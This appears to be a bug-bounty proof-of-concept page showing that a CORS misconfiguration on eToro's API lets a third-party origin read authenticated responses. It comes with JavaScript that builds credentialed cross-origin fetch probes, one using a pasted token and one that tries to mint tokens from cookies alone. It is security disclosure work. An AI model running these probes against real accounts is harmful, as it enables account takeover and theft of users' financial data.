Researcher: liamconner10 · header: X-Bug-Bounty: liamc
This page is served from — an UNTRUSTED third-party origin.
It demonstrates that the CORS origin check on www.etoro.com (a regex match) accepts this attacker-controlled
origin: the API echoes it back in Access-Control-Allow-Origin together with
Access-Control-Allow-Credentials: true, so the browser lets this page read authenticated responses.
Any other vector that can leak a JWE token (XSS, a malicious extension, OAuth redirect mishandling,
a token-disclosure endpoint, etc.) therefore turns into a full account takeover driven from this
attacker domain. The browser's same-origin policy, which would normally STOP an attacker page from
reading a victim's authenticated responses, is switched off for this origin by the server's own CORS headers.
Demo A — paste a real JWE and see what data is exfiltrated cross-origin
Paste the JWE (the value of the Authorization header that eToro's front-end JavaScript sets on every
request; copy it from your browser DevTools → Network → any /api/* request). This page is on a different
origin from eToro, so without the CORS bypass the browser would refuse to expose any response body to it.
With the bypass, you'll see the full authenticated JSON below. Note that the Authorization header makes
this a preflighted request: the server also has to list it in Access-Control-Allow-Headers, otherwise
the browser never sends the real request.
Demo B — try to mint a JWE from cookies alone (no JWE pasted)
Pure cross-origin call to the JWE-issuing endpoints, sent with credentials: include and no Authorization
header, so the only authentication material is the visitor's cookies. If any endpoint responds with a JWE
based on those cookies alone, that combined with the CORS bypass is end-to-end ATO with zero attacker
pre-existing state. Must be run in a browser that's logged in to eToro; cookies marked SameSite=Lax or
Strict are not attached to a cross-site fetch, so only cookies without that protection (SameSite=None; Secure)
reach the server here.
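To make both demos concrete, here is an added example (not code from this demo page) that models the browser's CORS decision for a credentialed cross-origin request and builds the fetch() options Demo A and Demo B use. The attacker origin https://attacker.example and the API paths are placeholders, the X-Bug-Bounty header value is the one given at the top of the page, and the readability check is the standard browser rule rather than anything specific to eToro.

```javascript
// Added example, not the researcher's demo-page code. Models (1) the browser's
// CORS decision for a request sent with credentials and (2) the fetch() options
// each demo uses. Origin names and API paths are placeholders, not eToro values.

const TARGET_ORIGIN = "https://www.etoro.com";
const ATTACKER_ORIGIN = "https://attacker.example"; // assumption: origin hosting this page

// Header names are case-insensitive; normalise before looking them up.
function lowerKeys(headers) {
  const out = {};
  for (const [k, v] of Object.entries(headers)) out[k.toLowerCase()] = v;
  return out;
}

// Browser rule for a credentialed cross-origin response: the body is readable
// only when Access-Control-Allow-Origin is the exact requesting origin (a
// wildcard is rejected once credentials are involved) and
// Access-Control-Allow-Credentials is literally "true".
function responseReadable(requestOrigin, responseHeaders) {
  const h = lowerKeys(responseHeaders);
  const acao = h["access-control-allow-origin"];
  const acac = h["access-control-allow-credentials"];
  if (!acao || acao === "*" || acao !== requestOrigin) return false;
  return acac === "true";
}

// A request carrying an Authorization header is preflighted. The preflight
// response must name that header in Access-Control-Allow-Headers; with
// credentials in play a literal "*" there is not treated as a wildcard.
function preflightAllowsAuth(preflightHeaders) {
  const h = lowerKeys(preflightHeaders);
  const allowed = (h["access-control-allow-headers"] || "")
    .split(",")
    .map((s) => s.trim().toLowerCase());
  return allowed.includes("authorization");
}

// Demo A: authenticated request from the attacker page using a pasted JWE.
function authedProbe(path, jwe) {
  return {
    url: TARGET_ORIGIN + path,
    init: {
      method: "GET",
      mode: "cors",
      credentials: "include", // victim's eToro cookies ride along as well
      headers: { Authorization: jwe, "X-Bug-Bounty": "liamc" },
    },
  };
}

// Demo B: cookie-only request to a candidate token-issuing endpoint. No
// Authorization header; the only authentication material is the victim's
// cookies, attached because of credentials: "include" (subject to SameSite).
function cookieOnlyProbe(path) {
  return {
    url: TARGET_ORIGIN + path,
    init: {
      method: "GET",
      mode: "cors",
      credentials: "include",
      headers: { "X-Bug-Bounty": "liamc" },
    },
  };
}

// Browser-only runner: issue a probe and report whether its body was readable
// from this origin. A CORS failure surfaces as a rejected fetch() promise.
async function runProbe(probe) {
  try {
    const res = await fetch(probe.url, probe.init);
    const body = await res.text();
    return { url: probe.url, readable: true, status: res.status, body };
  } catch (err) {
    return { url: probe.url, readable: false, error: String(err) };
  }
}
```

In the demo page, `runProbe(authedProbe("/api/<any>", pastedJwe))` is what Demo A would call and `runProbe(cookieOnlyProbe(path))` over the candidate paths is Demo B; `responseReadable` and `preflightAllowsAuth` are the same checks to apply to a captured response when confirming the reflection outside a browser, for example against headers copied from curl output.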